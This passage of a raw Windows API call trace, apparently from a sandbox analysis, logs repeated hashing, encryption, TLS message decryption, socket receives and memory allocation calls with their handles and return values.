phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0189.332] CryptHashData (hHash=0x432938, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0189.332] malloc (_Size=0x14) returned 0x3f654e0 [0189.332] free (_Block=0x0) [0189.333] CryptGetHashParam (in: hHash=0x432938, dwParam=0x2, pbData=0x3f654e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f654e0, pdwDataLen=0x339fa54) returned 1 [0189.333] CryptDestroyHash (hHash=0x432938) returned 1 [0189.333] free (_Block=0x3f654e0) [0189.333] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0189.333] CryptHashData (hHash=0x432bb8, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0189.333] malloc (_Size=0x14) returned 0x3f65300 [0189.333] free (_Block=0x0) [0189.333] CryptGetHashParam (in: hHash=0x432bb8, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x339fa54) returned 1 [0189.333] CryptDestroyHash (hHash=0x432bb8) returned 1 [0189.333] free (_Block=0x3f65300) [0189.333] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0189.333] CryptHashData (hHash=0x432938, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0189.333] malloc (_Size=0x14) returned 0x3f65520 [0189.333] free (_Block=0x0) [0189.333] CryptGetHashParam (in: hHash=0x432938, dwParam=0x2, pbData=0x3f65520, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65520, pdwDataLen=0x339fa54) returned 1 [0189.333] CryptDestroyHash (hHash=0x432938) returned 1 [0189.333] free (_Block=0x3f65520) [0189.333] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0189.333] CryptHashData (hHash=0x432e78, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0189.333] malloc (_Size=0x14) returned 0x3f654c0 [0189.333] free (_Block=0x0) [0189.333] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f654c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f654c0, pdwDataLen=0x339fa54) returned 1 [0189.333] CryptDestroyHash (hHash=0x432e78) returned 1 [0189.333] free (_Block=0x3f654c0) [0189.333] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0189.333] CryptHashData (hHash=0x432c78, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0189.333] malloc (_Size=0x14) returned 0x3f653c0 [0189.334] free (_Block=0x0) [0189.334] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x339fa54) returned 1 [0189.334] CryptDestroyHash (hHash=0x432c78) returned 1 [0189.334] free (_Block=0x3f653c0) [0189.334] free (_Block=0x3d81e60) [0189.334] malloc (_Size=0x50) returned 0x3d9ab40 [0189.334] free (_Block=0x0) [0189.334] free (_Block=0x60af20) [0189.334] free (_Block=0x60a248) [0189.334] malloc (_Size=0xb8) returned 0x3d81e60 [0189.334] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3d81f10 | out: phHash=0x3d81f10) returned 1 [0189.334] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3d81f14 | out: phHash=0x3d81f14) returned 1 [0189.334] CryptHashData (hHash=0x432978, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0189.334] CryptHashData (hHash=0x432bb8, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0189.334] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432a38) returned 1 [0189.334] CryptSetKeyParam (hKey=0x432a38, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0189.334] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432bf8) returned 1 [0189.334] CryptSetKeyParam (hKey=0x432bf8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0189.334] free (_Block=0x3d9ab40) [0189.334] SetEvent (hEvent=0x380) returned 1 [0189.335] free (_Block=0x36918f0) [0189.335] free (_Block=0x606108) [0189.335] free (_Block=0x3f68818) [0189.335] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0189.335] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0189.693] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0189.693] malloc (_Size=0x1fd) returned 0x606108 [0189.693] free (_Block=0x0) [0189.693] malloc (_Size=0x1fd) returned 0x60e6c0 [0189.693] free (_Block=0x0) [0189.693] free (_Block=0x0) [0189.693] free (_Block=0x606108) [0189.693] malloc (_Size=0x1fd) returned 0x606108 [0189.694] free (_Block=0x0) [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.694] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.695] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] malloc (_Size=0x1fd) returned 0x60e8c8 [0189.696] free (_Block=0x0) [0189.696] free (_Block=0x60e6c0) [0189.696] free (_Block=0x606108) [0189.696] malloc (_Size=0x1fd) returned 0x60e6c0 [0189.696] free (_Block=0x0) [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.696] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.697] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] CryptEncrypt (in: hKey=0x432bf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.698] malloc (_Size=0x1fd) returned 0x606108 [0189.698] free (_Block=0x0) [0189.698] free (_Block=0x60e8c8) [0189.698] malloc (_Size=0x1fd) returned 0x60e8c8 [0189.698] free (_Block=0x0) [0189.698] CryptDuplicateHash (in: hHash=0x432bb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0189.698] CryptHashData (hHash=0x432c78, pbData=0x60e8c8, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.698] malloc (_Size=0x14) returned 0x3f65280 [0189.698] free (_Block=0x0) [0189.698] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339faec) returned 1 [0189.698] CryptHashData (hHash=0x432bb8, pbData=0x60e8c8, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.698] free (_Block=0x3f65280) [0189.699] CryptDestroyHash (hHash=0x432c78) returned 1 [0189.699] free (_Block=0x60e8c8) [0189.699] free (_Block=0x60e6c0) [0189.699] malloc (_Size=0x1fd) returned 0x60e6c0 [0189.699] free (_Block=0x0) [0189.699] free (_Block=0x0) [0189.699] free (_Block=0x0) [0189.699] SetEvent (hEvent=0x380) returned 1 [0189.699] free (_Block=0x0) [0189.699] free (_Block=0x60e6c0) [0189.699] free (_Block=0x606108) [0189.699] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0189.699] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0190.350] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0190.350] malloc (_Size=0x1fd) returned 0x606108 [0190.351] free (_Block=0x0) [0190.351] malloc (_Size=0x1fd) returned 0x60e6c0 [0190.351] free (_Block=0x0) [0190.351] free (_Block=0x0) [0190.351] free (_Block=0x606108) [0190.351] malloc (_Size=0x1fd) returned 0x606108 [0190.351] free (_Block=0x0) [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.351] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.352] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0190.353] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, 